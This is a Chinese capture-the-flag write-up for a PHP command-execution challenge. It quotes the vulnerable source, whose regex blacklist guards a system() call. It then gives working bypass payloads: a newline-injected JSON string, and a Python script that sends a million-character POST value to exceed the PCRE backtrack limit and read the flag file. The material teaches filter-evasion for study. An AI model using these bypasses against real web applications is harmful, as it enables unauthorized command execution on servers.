知识点:json格式,GET传参上限,换行绕preg,超回溯上限绕preg
开头给了个框让我们输入json格式。
输入{“cmd”:“ls”}注意:json格式用双引号包裹起来
但cat的时候就报错了,{“cmd”:“cat index.php”},像其他tac,nl…都不行。
看了其他人的wp,这个虚空源码很迷,不知道咋过来的。
<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];
if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}
?>
因为它开头就设置了环境变量,所以我们读文件的时候要用绝对路径。
且过滤了很多,但是它是匹配整个字符串,也就是匹配开头和结尾,那意味着我们可以用%0a绕过,因为preg_match这边不是多行匹配,所以在匹配的时候不会匹配%0a,但是%0a又存在所以会绕过。
preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json))
又因为它改了环境变量,所以我们只能用绝对路径来调用系统命令
cat命令在/bin中保存
构造payload,{%0a"cmd":"/bin/cat%20/home/rceservice/flag"%0a}
,成功拿到flag
还有一种方法,就是用preg_match的回溯限制,长度为一百万,来绕过preg_match,因为当preg_match匹配的字符串太长的时候就会返回1,差不多就是这个意思。
详细请看: https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html
这里还有一个要注意的点就是,get传参是由长度限制,各个浏览器都不同,但肯定没有一百万,所以我们要用post提交
import requests
url = 'http://879f19e5-f850-4bf5-a4fb-bea23ce10945.node4.buuoj.cn:81/'
payload = {
'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","succ3":"'+'a'*1000000+'"}'
}
r = requests.post(url=url,data=payload)
print(r.text)